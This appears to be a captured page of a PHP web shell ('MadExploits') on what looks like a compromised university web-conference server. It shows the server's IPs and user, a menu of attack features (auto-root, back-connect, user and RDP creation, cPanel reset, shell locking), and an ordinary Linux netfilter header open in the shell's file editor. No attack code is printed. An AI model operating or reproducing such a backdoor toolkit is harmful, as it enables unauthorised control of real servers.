Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.137.170.50
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
include /
linux /
netfilter /
[ HOME SHELL ]
Name
Size
Permission
Action
ipset
[ DIR ]
drwxr-xr-x
nf_conntrack_common.h
4.32
KB
-rw-r--r--
nf_conntrack_ftp.h
438
B
-rw-r--r--
nf_conntrack_sctp.h
597
B
-rw-r--r--
nf_conntrack_tcp.h
1.38
KB
-rw-r--r--
nf_conntrack_tuple_common.h
896
B
-rw-r--r--
nf_log.h
538
B
-rw-r--r--
nf_nat.h
1.49
KB
-rw-r--r--
nf_synproxy.h
576
B
-rw-r--r--
nf_tables.h
50.75
KB
-rw-r--r--
nf_tables_compat.h
731
B
-rw-r--r--
nfnetlink.h
2.37
KB
-rw-r--r--
nfnetlink_acct.h
900
B
-rw-r--r--
nfnetlink_compat.h
2.39
KB
-rw-r--r--
nfnetlink_conntrack.h
5.79
KB
-rw-r--r--
nfnetlink_cthelper.h
1.18
KB
-rw-r--r--
nfnetlink_cttimeout.h
2.88
KB
-rw-r--r--
nfnetlink_log.h
3.03
KB
-rw-r--r--
nfnetlink_osf.h
2.6
KB
-rw-r--r--
nfnetlink_queue.h
3.42
KB
-rw-r--r--
x_tables.h
4.36
KB
-rw-r--r--
xt_AUDIT.h
718
B
-rw-r--r--
xt_CHECKSUM.h
563
B
-rw-r--r--
xt_CLASSIFY.h
217
B
-rw-r--r--
xt_CONNMARK.h
199
B
-rw-r--r--
xt_CONNSECMARK.h
301
B
-rw-r--r--
xt_CT.h
853
B
-rw-r--r--
xt_DSCP.h
697
B
-rw-r--r--
xt_HMARK.h
933
B
-rw-r--r--
xt_IDLETIMER.h
1.36
KB
-rw-r--r--
xt_LED.h
470
B
-rw-r--r--
xt_LOG.h
642
B
-rw-r--r--
xt_MARK.h
184
B
-rw-r--r--
xt_NFLOG.h
556
B
-rw-r--r--
xt_NFQUEUE.h
779
B
-rw-r--r--
xt_RATEEST.h
390
B
-rw-r--r--
xt_SECMARK.h
648
B
-rw-r--r--
xt_SYNPROXY.h
498
B
-rw-r--r--
xt_TCPMSS.h
235
B
-rw-r--r--
xt_TCPOPTSTRIP.h
407
B
-rw-r--r--
xt_TEE.h
333
B
-rw-r--r--
xt_TPROXY.h
575
B
-rw-r--r--
xt_addrtype.h
1.06
KB
-rw-r--r--
xt_bpf.h
935
B
-rw-r--r--
xt_cgroup.h
740
B
-rw-r--r--
xt_cluster.h
374
B
-rw-r--r--
xt_comment.h
230
B
-rw-r--r--
xt_connbytes.h
577
B
-rw-r--r--
xt_connlabel.h
360
B
-rw-r--r--
xt_connlimit.h
575
B
-rw-r--r--
xt_connmark.h
900
B
-rw-r--r--
xt_conntrack.h
2.5
KB
-rw-r--r--
xt_cpu.h
199
B
-rw-r--r--
xt_dccp.h
483
B
-rw-r--r--
xt_devgroup.h
429
B
-rw-r--r--
xt_dscp.h
701
B
-rw-r--r--
xt_ecn.h
736
B
-rw-r--r--
xt_esp.h
418
B
-rw-r--r--
xt_hashlimit.h
3.18
KB
-rw-r--r--
xt_helper.h
188
B
-rw-r--r--
xt_ipcomp.h
485
B
-rw-r--r--
xt_iprange.h
581
B
-rw-r--r--
xt_ipvs.h
680
B
-rw-r--r--
xt_l2tp.h
739
B
-rw-r--r--
xt_length.h
221
B
-rw-r--r--
xt_limit.h
673
B
-rw-r--r--
xt_mac.h
227
B
-rw-r--r--
xt_mark.h
260
B
-rw-r--r--
xt_multiport.h
721
B
-rw-r--r--
xt_nfacct.h
421
B
-rw-r--r--
xt_osf.h
1.66
KB
-rw-r--r--
xt_owner.h
535
B
-rw-r--r--
xt_physdev.h
553
B
-rw-r--r--
xt_pkttype.h
188
B
-rw-r--r--
xt_policy.h
1.03
KB
-rw-r--r--
xt_quota.h
400
B
-rw-r--r--
xt_rateest.h
859
B
-rw-r--r--
xt_realm.h
220
B
-rw-r--r--
xt_recent.h
1.03
KB
-rw-r--r--
xt_rpfilter.h
320
B
-rw-r--r--
xt_sctp.h
2.27
KB
-rw-r--r--
xt_set.h
1.78
KB
-rw-r--r--
xt_socket.h
640
B
-rw-r--r--
xt_state.h
331
B
-rw-r--r--
xt_statistic.h
716
B
-rw-r--r--
xt_string.h
664
B
-rw-r--r--
xt_tcpmss.h
253
B
-rw-r--r--
xt_tcpudp.h
1.22
KB
-rw-r--r--
xt_time.h
730
B
-rw-r--r--
xt_u32.h
752
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nf_conntrack_common.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef _NF_CONNTRACK_COMMON_H #define _NF_CONNTRACK_COMMON_H /* Connection state tracking for netfilter. This is separated from, but required by, the NAT layer; it can also be used by an iptables extension. */ enum ip_conntrack_info { /* Part of an established connection (either direction). */ IP_CT_ESTABLISHED, /* Like NEW, but related to an existing connection, or ICMP error (in either direction). */ IP_CT_RELATED, /* Started a new connection to track (only IP_CT_DIR_ORIGINAL); may be a retransmission. */ IP_CT_NEW, /* >= this indicates reply direction */ IP_CT_IS_REPLY, IP_CT_ESTABLISHED_REPLY = IP_CT_ESTABLISHED + IP_CT_IS_REPLY, IP_CT_RELATED_REPLY = IP_CT_RELATED + IP_CT_IS_REPLY, /* No NEW in reply direction. */ /* Number of distinct IP_CT types. */ IP_CT_NUMBER, /* only for userspace compatibility */ IP_CT_NEW_REPLY = IP_CT_NUMBER, }; #define NF_CT_STATE_INVALID_BIT (1 << 0) #define NF_CT_STATE_BIT(ctinfo) (1 << ((ctinfo) % IP_CT_IS_REPLY + 1)) #define NF_CT_STATE_UNTRACKED_BIT (1 << 6) /* Bitset representing status of connection. */ enum ip_conntrack_status { /* It's an expected connection: bit 0 set. This bit never changed */ IPS_EXPECTED_BIT = 0, IPS_EXPECTED = (1 << IPS_EXPECTED_BIT), /* We've seen packets both ways: bit 1 set. Can be set, not unset. */ IPS_SEEN_REPLY_BIT = 1, IPS_SEEN_REPLY = (1 << IPS_SEEN_REPLY_BIT), /* Conntrack should never be early-expired. */ IPS_ASSURED_BIT = 2, IPS_ASSURED = (1 << IPS_ASSURED_BIT), /* Connection is confirmed: originating packet has left box */ IPS_CONFIRMED_BIT = 3, IPS_CONFIRMED = (1 << IPS_CONFIRMED_BIT), /* Connection needs src nat in orig dir. This bit never changed. */ IPS_SRC_NAT_BIT = 4, IPS_SRC_NAT = (1 << IPS_SRC_NAT_BIT), /* Connection needs dst nat in orig dir. This bit never changed. */ IPS_DST_NAT_BIT = 5, IPS_DST_NAT = (1 << IPS_DST_NAT_BIT), /* Both together. */ IPS_NAT_MASK = (IPS_DST_NAT | IPS_SRC_NAT), /* Connection needs TCP sequence adjusted. */ IPS_SEQ_ADJUST_BIT = 6, IPS_SEQ_ADJUST = (1 << IPS_SEQ_ADJUST_BIT), /* NAT initialization bits. */ IPS_SRC_NAT_DONE_BIT = 7, IPS_SRC_NAT_DONE = (1 << IPS_SRC_NAT_DONE_BIT), IPS_DST_NAT_DONE_BIT = 8, IPS_DST_NAT_DONE = (1 << IPS_DST_NAT_DONE_BIT), /* Both together */ IPS_NAT_DONE_MASK = (IPS_DST_NAT_DONE | IPS_SRC_NAT_DONE), /* Connection is dying (removed from lists), can not be unset. */ IPS_DYING_BIT = 9, IPS_DYING = (1 << IPS_DYING_BIT), /* Connection has fixed timeout. */ IPS_FIXED_TIMEOUT_BIT = 10, IPS_FIXED_TIMEOUT = (1 << IPS_FIXED_TIMEOUT_BIT), /* Conntrack is a template */ IPS_TEMPLATE_BIT = 11, IPS_TEMPLATE = (1 << IPS_TEMPLATE_BIT), /* Conntrack is a fake untracked entry. Obsolete and not used anymore */ IPS_UNTRACKED_BIT = 12, IPS_UNTRACKED = (1 << IPS_UNTRACKED_BIT), /* Conntrack got a helper explicitly attached via CT target. */ IPS_HELPER_BIT = 13, IPS_HELPER = (1 << IPS_HELPER_BIT), /* Conntrack has been offloaded to flow table. */ IPS_OFFLOAD_BIT = 14, IPS_OFFLOAD = (1 << IPS_OFFLOAD_BIT), /* Be careful here, modifying these bits can make things messy, * so don't let users modify them directly. */ IPS_UNCHANGEABLE_MASK = (IPS_NAT_DONE_MASK | IPS_NAT_MASK | IPS_EXPECTED | IPS_CONFIRMED | IPS_DYING | IPS_SEQ_ADJUST | IPS_TEMPLATE | IPS_OFFLOAD), __IPS_MAX_BIT = 15, }; /* Connection tracking event types */ enum ip_conntrack_events { IPCT_NEW, /* new conntrack */ IPCT_RELATED, /* related conntrack */ IPCT_DESTROY, /* destroyed conntrack */ IPCT_REPLY, /* connection has seen two-way traffic */ IPCT_ASSURED, /* connection status has changed to assured */ IPCT_PROTOINFO, /* protocol information has changed */ IPCT_HELPER, /* new helper has been set */ IPCT_MARK, /* new mark has been set */ IPCT_SEQADJ, /* sequence adjustment has changed */ IPCT_NATSEQADJ = IPCT_SEQADJ, IPCT_SECMARK, /* new security mark has been set */ IPCT_LABEL, /* new connlabel has been set */ IPCT_SYNPROXY, /* synproxy has been set */ }; enum ip_conntrack_expect_events { IPEXP_NEW, /* new expectation */ IPEXP_DESTROY, /* destroyed expectation */ }; /* expectation flags */ #define NF_CT_EXPECT_PERMANENT 0x1 #define NF_CT_EXPECT_INACTIVE 0x2 #define NF_CT_EXPECT_USERSPACE 0x4 #endif /* _NF_CONNTRACK_COMMON_H */
Close